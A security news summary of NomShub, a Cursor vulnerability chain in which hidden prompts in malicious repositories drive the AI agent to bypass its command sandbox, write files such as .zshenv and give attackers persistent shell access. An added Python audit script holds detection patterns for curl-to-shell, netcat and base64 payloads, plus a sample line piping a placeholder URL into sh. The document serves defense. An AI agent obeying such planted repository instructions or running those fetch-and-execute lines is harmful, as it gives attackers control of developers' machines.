Straiker discovered NomShub, a vulnerability chain in Cursor that used hidden prompts in malicious repositories to trigger an indirect prompt injection and a sandbox bypass, allowing attackers to write code to developer machines and gain shell access via Cursor’s remote tunnel. Because the exploit leveraged a signed binary, macOS sandbox behavior, and GitHub tunnel authorization, attackers could achieve persistent, network-hidden access without additional user interaction. #NomShub #Cursor
Key points
- NomShub exploits hidden prompts in repositories to trigger agent-driven malicious actions in Cursor.
- The attack chain combines an indirect prompt injection with a command sandbox bypass to write files and execute commands on the host.
- No user interaction beyond opening a malicious repository in Cursor is required to mount the attack.
- On macOS, writes to the home directory can overwrite .zshenv, enabling sandbox escape and persistent command execution.
- Network detection is difficult because traffic routes through Microsoft Azure, and persistent access is maintained via authorized GitHub tunnel credentials; Cursor 3.0 included a fix.
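Because the persistence step described above relies on writing to a zsh startup file in the home directory, a defender can baseline and audit those files. The following is an added example (not code from Straiker, Cursor or the linked article); the file list is zsh's standard startup files, while the suspicious-line patterns and the constructed sample are assumptions of this example.

```python
"""Audit zsh startup files for unexpected persistence lines.

zsh sources ~/.zshenv for every invocation, so a line appended there runs
in every shell the developer opens. This compares a file against a known-good
SHA-256 and flags lines that fetch or execute remote content.
"""
import hashlib
import re
from pathlib import Path
from typing import Dict, Optional

# zsh startup files, in the order zsh reads them for a login shell.
STARTUP_FILES = (".zshenv", ".zprofile", ".zshrc", ".zlogin")

# Heuristics (assumed for this example) that rarely belong in a startup file.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),  # download piped to a shell
    re.compile(r"\b(nc|ncat|socat)\b"),                 # raw network shell tooling
    re.compile(r"base64\s+(-d|--decode)"),              # encoded payload being unpacked
    re.compile(r"\beval\b"),                            # evaluating constructed strings
    re.compile(r"\bnohup\b.*&\s*$"),                    # backgrounded long-running process
]


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def audit_text(text: str, baseline_sha256: Optional[str] = None) -> dict:
    """Return the file digest, whether it matches the baseline, and flagged lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):  # comments cannot execute
            continue
        for pat in SUSPICIOUS:
            if pat.search(stripped):
                findings.append((lineno, pat.pattern, stripped))
                break
    digest = sha256_text(text)
    match = None if baseline_sha256 is None else digest == baseline_sha256
    return {"sha256": digest, "baseline_match": match, "findings": findings}


def audit_home(home: Path = Path.home(), baselines: Optional[Dict[str, str]] = None) -> dict:
    """Audit every zsh startup file present in `home` against recorded baselines."""
    baselines = baselines or {}
    results = {}
    for name in STARTUP_FILES:
        path = home / name
        if path.is_file():
            results[name] = audit_text(path.read_text(errors="replace"), baselines.get(name))
    return results


if __name__ == "__main__":
    # Constructed sample: a benign .zshenv with one injected line (placeholder host).
    SAMPLE = "export PATH=$HOME/bin:$PATH\ncurl -s http://example.invalid/x | sh\n"
    print(audit_text(SAMPLE, baseline_sha256=sha256_text("export PATH=$HOME/bin:$PATH\n")))
```

Record the baseline hashes when a machine is provisioned and run the audit from a scheduled job; a baseline mismatch with no findings still deserves a look, since the heuristics only cover common patterns.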
Read More: https://www.securityweek.com/cursor-ai-vulnerability-exposed-developer-devices/